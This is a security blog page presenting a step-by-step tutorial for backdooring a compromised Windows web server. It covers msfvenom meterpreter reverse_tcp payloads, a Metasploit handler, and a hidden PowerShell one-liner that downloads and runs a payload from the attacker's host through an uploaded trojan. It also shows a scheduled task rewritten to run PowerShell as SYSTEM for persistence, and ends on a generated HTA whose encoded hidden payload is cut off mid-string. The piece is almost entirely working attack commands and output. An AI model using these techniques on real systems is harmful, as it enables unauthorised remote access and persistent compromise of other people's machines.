<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.ico?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.ico?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="Windows," />










<meta name="description" content="Today I will show you the backdoor consist of Windows Powershell, hta (An HTML Application), little about the msfvenom and timing tasks.">
<meta name="keywords" content="Windows">
<meta property="og:type" content="article">
<meta property="og:title" content="Windows Powershell Backdoor -- Timing Task">
<meta property="og:url" content="/2017-12-03-Windows-Powershell-backdoor/index.html">
<meta property="og:site_name" content="Security blog">
<meta property="og:description" content="Today I will show you the backdoor consist of Windows Powershell, hta (An HTML Application), little about the msfvenom and timing tasks.">
<meta property="og:updated_time" content="2017-12-05T14:24:54.226Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Windows Powershell Backdoor -- Timing Task">
<meta name="twitter:description" content="Today I will show you the backdoor consist of Windows Powershell, hta (An HTML Application), little about the msfvenom and timing tasks.">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="/2017-12-03-Windows-Powershell-backdoor/"/>





  <title>Windows Powershell Backdoor -- Timing Task | Security blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Security blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="/2017-12-03-Windows-Powershell-backdoor/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ꭰ">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Security blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Windows Powershell Backdoor -- Timing Task</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2017-12-05T22:13:27+08:00">
                2017-12-05
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Backdoor/" itemprop="url" rel="index">
                    <span itemprop="name">Backdoor</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>Today I will show you the backdoor consist of Windows Powershell, <a href="https://en.wikipedia.org/wiki/HTML_Application" target="_blank" rel="external">hta</a> (An HTML Application), little about the msfvenom and timing tasks. <a id="more"></a></p>
<h3 id="HTA"><a href="#HTA" class="headerlink" title="HTA"></a>HTA</h3><p>An HTML Application (HTA) is a Microsoft Windows program whose source code consist of HTML, Dynamic HTML, and one or more scripting languages supported by Internet Explorer.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div></pre></td><td class="code"><pre><div class="line">&lt;html&gt;</div><div class="line">&lt;head&gt;</div><div class="line">&lt;title&gt;hello&lt;/title&gt;</div><div class="line">&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=UTF-8&quot; /&gt;</div><div class="line">&lt;HTA:ApplicationID=&quot;oHTA&quot; Applicationname=&quot;hta_app&quot; border=&quot;thin&quot; borderstyle=&quot;normal&quot; icon=&quot;hello.ico&quot; maximizebutton=&quot;yes&quot; minimizebutton=&quot;yes&quot; showintaskbar=&quot;no&quot; singleinstance=&quot;no&quot; sysmenu=&quot;yes&quot; version=&quot;777&quot; windowstate=&quot;normal&quot; scroll=&quot;yes&quot;&gt;</div><div class="line">&lt;/head&gt;</div><div class="line">&lt;body&gt;</div><div class="line">&lt;center&gt;</div><div class="line">&lt;br&gt;</div><div class="line">&lt;h1&gt;Hello HTA&lt;/h1&gt;</div><div class="line">&lt;br&gt;</div><div class="line">&lt;h2&gt;( ⊙ o ⊙ )/出来吧！计算器！&lt;/h2&gt;</div><div class="line">&lt;br&gt;</div><div class="line">&lt;/center&gt;</div><div class="line">&lt;script language=&quot;VBScript&quot;&gt;</div><div class="line">Set Hello = CreateObject(&quot;Wscript.Shell&quot;)</div><div class="line">Hello.Run &quot;calc.exe&quot;</div><div class="line">&lt;/script&gt;</div><div class="line">&lt;/body&gt;</div><div class="line">&lt;/html&gt;</div></pre></td></tr></table></figure>
<p>Save the codes as <em>filename.hta</em> and then click the <em>filename.hta</em>, the default <em>calc.exe</em> will show in front of you. </p>
<h3 id="Reverse-Shell-By-PowerShell"><a href="#Reverse-Shell-By-PowerShell" class="headerlink" title="Reverse Shell By PowerShell"></a>Reverse Shell By PowerShell</h3><p>Assuming that we are penetrate a website built with aspx and we can execute most command with the previous uploaded trojan . Maybe you can have many ideas to reverse shell from the target machine at the next phase. </p>
<h4 id="Generate-PS1-File"><a href="#Generate-PS1-File" class="headerlink" title="Generate PS1 File"></a>Generate PS1 File</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">msfvenom -p windows/x64(It depends on your target arch)/meterpreter/reverse_tcp LHOST=YourIP LPORT=Port -f psh-reflection &gt; filename.ps1</div></pre></td></tr></table></figure>
<p>Here is another tip for you when your server is lack of WebServer ( Apahce, Nginx and so on ). Just use the following command in your working directory with the <em>filename.ps1</em> there as the tempoary server when you have nothing on your server except the <em>msfconsole</em>.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">python -m SimpleHTTPServer</div><div class="line">Serving HTTP on 0.0.0.0 port 8000</div></pre></td></tr></table></figure>
<p>Enter the port number you want follow the <em>SimpleHTTPServer</em> to change the default port 8000.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">python -m SimpleHTTPServer 80</div><div class="line">Serving HTTP on 0.0.0.0 port 80</div></pre></td></tr></table></figure>
<h4 id="Listener"><a href="#Listener" class="headerlink" title="Listener"></a>Listener</h4><p>The next is to listen the incoming connection after we prepared a payload on public server. Here are the steps for capturing the traffic on specific  port.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">msf &gt; use exploit/multi/handler</div><div class="line">msf exploit(handler) &gt; set payload windows/x64/meterpreter/reverse_tcp</div><div class="line">payload =&gt; windows/meterpreter/reverse_tcp</div><div class="line">msf exploit(handler) &gt; set lhost xxx.xxx.xxx.xxx</div><div class="line">lhost =&gt; xxx.xxx.xxx.xxx</div><div class="line">msf exploit(handler) &gt; set lport xxx</div><div class="line">lport =&gt; xxx</div><div class="line">msf &gt; run -j</div></pre></td></tr></table></figure>
<h4 id="Get-Shell"><a href="#Get-Shell" class="headerlink" title="Get Shell"></a>Get Shell</h4><p>Now everything is done,  what we need to do is run the following the command with the previous trojan then get meterpreter session.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">powershell -windowstyle hidden -exec bypass -c &quot;IEX (New-Object Net.WebClient).DownloadString(&apos;http://YourIP:Port/filename.ps1&apos;);filename.ps1&quot;</div></pre></td></tr></table></figure>
<h3 id="Keep-Permanent-Backdoor"><a href="#Keep-Permanent-Backdoor" class="headerlink" title="Keep Permanent Backdoor"></a>Keep Permanent Backdoor</h3><p>Sometimes we need to schedule our life, so as the server.</p>
<h4 id="Query-Timing-Tasks-On-Windows"><a href="#Query-Timing-Tasks-On-Windows" class="headerlink" title="Query Timing Tasks On Windows"></a>Query Timing Tasks On Windows</h4><p>Let’s query the default tasks on Windows 7.</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">PS C:\Windows\system32&gt;schtasks /query </div><div class="line">Folder: \</div><div class="line">TaskName                                 Next Run Time          Status</div><div class="line">======================================== ====================== ===============</div><div class="line">GoogleUpdateTaskMachineCore              <span class="number">2017</span>/<span class="number">12</span>/<span class="number">6</span> <span class="number">12</span>:<span class="number">44</span>:<span class="number">30</span>     Running</div><div class="line">GoogleUpdateTaskMachineUA                <span class="number">2017</span>/<span class="number">12</span>/<span class="number">5</span> <span class="number">21</span>:<span class="number">44</span>:<span class="number">30</span>     Unknown</div><div class="line"></div><div class="line">Folder: \Microsoft</div><div class="line">TaskName                                 Next Run Time          Status</div><div class="line">======================================== ====================== ===============</div><div class="line">INFO: There are no scheduled tasks presently available at your access level.</div></pre></td></tr></table></figure>
<p>You must run the PowerShell as the administrator and you can execute the command <em>chcp 437</em> to set English as the default display language when the command above get nothing.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">chcp 437</div><div class="line">Active code page: 437</div></pre></td></tr></table></figure>
<h4 id="Create-Timing-Tasks"><a href="#Create-Timing-Tasks" class="headerlink" title="Create Timing Tasks"></a>Create Timing Tasks</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">PS C:\Windows\system32&gt;schtasks /create /tn test /tr calc /sc minute </div><div class="line">SUCCESS: The scheduled task <span class="string">"test"</span> has successfully been created.</div></pre></td></tr></table></figure>
<p>You will see that a <em>calc</em> pop up a minute later.</p>
<h4 id="Export-Timing-Task-And-Backdoor"><a href="#Export-Timing-Task-And-Backdoor" class="headerlink" title="Export Timing Task And Backdoor"></a>Export Timing Task And Backdoor</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">PS C:\Windows\system32&gt;schtasks /query /xml /tn test &gt; test.xml</div></pre></td></tr></table></figure>
<p>Open the exported <em>test.xml</em> in <em>C:\Windows\system32</em>.</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div></pre></td><td class="code"><pre><div class="line"><span class="php"><span class="meta">&lt;?</span>xml version=<span class="string">"1.0"</span> encoding=<span class="string">"UTF-16"</span><span class="meta">?&gt;</span></span></div><div class="line"></div><div class="line"><span class="tag">&lt;<span class="name">Task</span> <span class="attr">version</span>=<span class="string">"1.2"</span> <span class="attr">xmlns</span>=<span class="string">"http://schemas.microsoft.com/windows/2004/02/mit/task"</span>&gt;</span></div><div class="line"></div><div class="line">  <span class="tag">&lt;<span class="name">RegistrationInfo</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">Date</span>&gt;</span>2017-12-05T21:20:54<span class="tag">&lt;/<span class="name">Date</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">Author</span>&gt;</span>TEST<span class="tag">&lt;/<span class="name">Author</span>&gt;</span></div><div class="line"></div><div class="line">  <span class="tag">&lt;/<span class="name">RegistrationInfo</span>&gt;</span></div><div class="line"></div><div class="line">  <span class="tag">&lt;<span class="name">Triggers</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">TimeTrigger</span>&gt;</span></div><div class="line"></div><div class="line">      <span class="tag">&lt;<span class="name">Repetition</span>&gt;</span></div><div class="line"></div><div class="line">        <span class="tag">&lt;<span class="name">Interval</span>&gt;</span>PT1M<span class="tag">&lt;/<span class="name">Interval</span>&gt;</span></div><div class="line"></div><div class="line">        <span class="tag">&lt;<span class="name">StopAtDurationEnd</span>&gt;</span>false<span class="tag">&lt;/<span class="name">StopAtDurationEnd</span>&gt;</span></div><div class="line"></div><div class="line">      <span class="tag">&lt;/<span class="name">Repetition</span>&gt;</span></div><div class="line"></div><div class="line">      <span class="tag">&lt;<span class="name">StartBoundary</span>&gt;</span>2017-12-05T21:20:00<span class="tag">&lt;/<span class="name">StartBoundary</span>&gt;</span></div><div class="line"></div><div class="line">      <span class="tag">&lt;<span class="name">Enabled</span>&gt;</span>true<span class="tag">&lt;/<span class="name">Enabled</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;/<span class="name">TimeTrigger</span>&gt;</span></div><div class="line"></div><div class="line">  <span class="tag">&lt;/<span class="name">Triggers</span>&gt;</span></div><div class="line"></div><div class="line">  <span class="tag">&lt;<span class="name">Settings</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">MultipleInstancesPolicy</span>&gt;</span>IgnoreNew<span class="tag">&lt;/<span class="name">MultipleInstancesPolicy</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">DisallowStartIfOnBatteries</span>&gt;</span>true<span class="tag">&lt;/<span class="name">DisallowStartIfOnBatteries</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">StopIfGoingOnBatteries</span>&gt;</span>true<span class="tag">&lt;/<span class="name">StopIfGoingOnBatteries</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">AllowHardTerminate</span>&gt;</span>true<span class="tag">&lt;/<span class="name">AllowHardTerminate</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">StartWhenAvailable</span>&gt;</span>false<span class="tag">&lt;/<span class="name">StartWhenAvailable</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">RunOnlyIfNetworkAvailable</span>&gt;</span>false<span class="tag">&lt;/<span class="name">RunOnlyIfNetworkAvailable</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">IdleSettings</span>&gt;</span></div><div class="line"></div><div class="line">      <span class="tag">&lt;<span class="name">Duration</span>&gt;</span>PT10M<span class="tag">&lt;/<span class="name">Duration</span>&gt;</span></div><div class="line"></div><div class="line">      <span class="tag">&lt;<span class="name">WaitTimeout</span>&gt;</span>PT1H<span class="tag">&lt;/<span class="name">WaitTimeout</span>&gt;</span></div><div class="line"></div><div class="line">      <span class="tag">&lt;<span class="name">StopOnIdleEnd</span>&gt;</span>true<span class="tag">&lt;/<span class="name">StopOnIdleEnd</span>&gt;</span></div><div class="line"></div><div class="line">      <span class="tag">&lt;<span class="name">RestartOnIdle</span>&gt;</span>false<span class="tag">&lt;/<span class="name">RestartOnIdle</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;/<span class="name">IdleSettings</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">AllowStartOnDemand</span>&gt;</span>true<span class="tag">&lt;/<span class="name">AllowStartOnDemand</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">Enabled</span>&gt;</span>true<span class="tag">&lt;/<span class="name">Enabled</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">Hidden</span>&gt;</span>false<span class="tag">&lt;/<span class="name">Hidden</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">RunOnlyIfIdle</span>&gt;</span>false<span class="tag">&lt;/<span class="name">RunOnlyIfIdle</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">WakeToRun</span>&gt;</span>false<span class="tag">&lt;/<span class="name">WakeToRun</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">ExecutionTimeLimit</span>&gt;</span>PT72H<span class="tag">&lt;/<span class="name">ExecutionTimeLimit</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">Priority</span>&gt;</span>7<span class="tag">&lt;/<span class="name">Priority</span>&gt;</span></div><div class="line"></div><div class="line">  <span class="tag">&lt;/<span class="name">Settings</span>&gt;</span></div><div class="line"></div><div class="line">  <span class="tag">&lt;<span class="name">Actions</span> <span class="attr">Context</span>=<span class="string">"Author"</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">Exec</span>&gt;</span></div><div class="line"></div><div class="line">      <span class="tag">&lt;<span class="name">Command</span>&gt;</span>calc<span class="tag">&lt;/<span class="name">Command</span>&gt;</span>  # To change</div><div class="line"></div><div class="line">    <span class="tag">&lt;/<span class="name">Exec</span>&gt;</span></div><div class="line"></div><div class="line">  <span class="tag">&lt;/<span class="name">Actions</span>&gt;</span></div><div class="line"></div><div class="line">  <span class="tag">&lt;<span class="name">Principals</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">Principal</span> <span class="attr">id</span>=<span class="string">"Author"</span>&gt;</span></div><div class="line"></div><div class="line">      <span class="tag">&lt;<span class="name">UserId</span>&gt;</span>TEST-PC\TEST<span class="tag">&lt;/<span class="name">UserId</span>&gt;</span>  # To change</div><div class="line"></div><div class="line">      <span class="tag">&lt;<span class="name">LogonType</span>&gt;</span>InteractiveToken<span class="tag">&lt;/<span class="name">LogonType</span>&gt;</span></div><div class="line"></div><div class="line">      <span class="tag">&lt;<span class="name">RunLevel</span>&gt;</span>LeastPrivilege<span class="tag">&lt;/<span class="name">RunLevel</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;/<span class="name">Principal</span>&gt;</span></div><div class="line"></div><div class="line">  <span class="tag">&lt;/<span class="name">Principals</span>&gt;</span></div><div class="line"></div><div class="line"><span class="tag">&lt;/<span class="name">Task</span>&gt;</span></div></pre></td></tr></table></figure>
<p>As you can see, I marked two tag in the above file. First we should change the content of the tag <em>Command</em>  to <em>powershell.exe</em> then add the new tag <em>Argument</em> below.</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">Actions</span> <span class="attr">Context</span>=<span class="string">"Author"</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">Exec</span>&gt;</span></div><div class="line"></div><div class="line">      <span class="tag">&lt;<span class="name">Command</span>&gt;</span>powershell.exe<span class="tag">&lt;/<span class="name">Command</span>&gt;</span>  </div><div class="line">      <span class="tag">&lt;<span class="name">Arguments</span>&gt;</span>To fill<span class="tag">&lt;/<span class="name">Arguments</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;/<span class="name">Exec</span>&gt;</span></div><div class="line"></div><div class="line">  <span class="tag">&lt;/<span class="name">Actions</span>&gt;</span></div><div class="line"></div><div class="line">  <span class="tag">&lt;<span class="name">Principals</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;<span class="name">Principal</span> <span class="attr">id</span>=<span class="string">"Author"</span>&gt;</span></div><div class="line"></div><div class="line">      <span class="tag">&lt;<span class="name">UserId</span>&gt;</span>NT AUTHORITY\SYSTEM<span class="tag">&lt;/<span class="name">UserId</span>&gt;</span>  </div><div class="line"></div><div class="line">      <span class="tag">&lt;<span class="name">LogonType</span>&gt;</span>InteractiveToken<span class="tag">&lt;/<span class="name">LogonType</span>&gt;</span></div><div class="line"></div><div class="line">      <span class="tag">&lt;<span class="name">RunLevel</span>&gt;</span>LeastPrivilege<span class="tag">&lt;/<span class="name">RunLevel</span>&gt;</span></div><div class="line"></div><div class="line">    <span class="tag">&lt;/<span class="name">Principal</span>&gt;</span></div><div class="line"></div><div class="line">  <span class="tag">&lt;/<span class="name">Principals</span>&gt;</span></div></pre></td></tr></table></figure>
<p> All right, we are near to the target. Let’s see something different but interesting.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=YourIP LPORT=Port -f hta-psh -o Windows_x64_Reserver_Tcp.hta</div></pre></td></tr></table></figure>
<p>Is this similar to the command at the beginning? Open your <em>Windows_x64_Reserver_Tcp.hta</em>.</p>
<figure class="highlight vbscript"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">&lt;script language=<span class="string">"VBScript"</span>&gt;</div><div class="line">  window.moveTo <span class="number">-4000</span>, <span class="number">-4000</span></div><div class="line">  <span class="keyword">Set</span> d6b4groCSc = <span class="built_in">CreateObject</span>(<span class="string">"Wscript.Shell"</span>)</div><div class="line">  <span class="keyword">Set</span> wW7lCD768yEu = <span class="built_in">CreateObject</span>(<span class="string">"Scripting.FileSystemObject"</span>)</div><div class="line">  <span class="keyword">For</span> <span class="keyword">each</span> path <span class="keyword">in</span> <span class="built_in">Split</span>(d6b4groCSc.ExpandEnvironmentStrings(<span class="string">"%PSModulePath%"</span>),<span class="string">";"</span>)</div><div class="line">    <span class="keyword">If</span> wW7lCD768yEu.FileExists(path + <span class="string">"\..\powershell.exe"</span>) <span class="keyword">Then</span></div><div class="line">      d6b4groCSc.Run <span class="string">"powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBBAFcAbABKAGwAbwBDAEEANwBWAFcAKwAyACsAYgBTAEIARAArAHUAWgBYADYAUAA2AEQASwBrAGsARgB4AEQARQA3AGQAbgBCAHUAcAAwAGcARwBHAEcATgBjAGsASgB0AGoANABkAGQAWgBwAEEAMgB2AFkAcwBJAEEATABTADIAegBTADYALwA5ACsAcwAzADYAawBxAFoATABlAHQAUwBjAGQAcwB1AFIAOQB6AE8ATwBiAGIAMgBZAFkAVgBtAFgAcQBNADUASwBsAEEAdABZACsAbQBNAEsAWABOADYAOQBmAEQAVgBHAE8ARQBrAEcAcwBaAFUATwAxAEkAZABTAHEARAA5AEsAcgBWADMAQgBhAGUANwBDAFIANgBnAGcAZgBCAFgARwB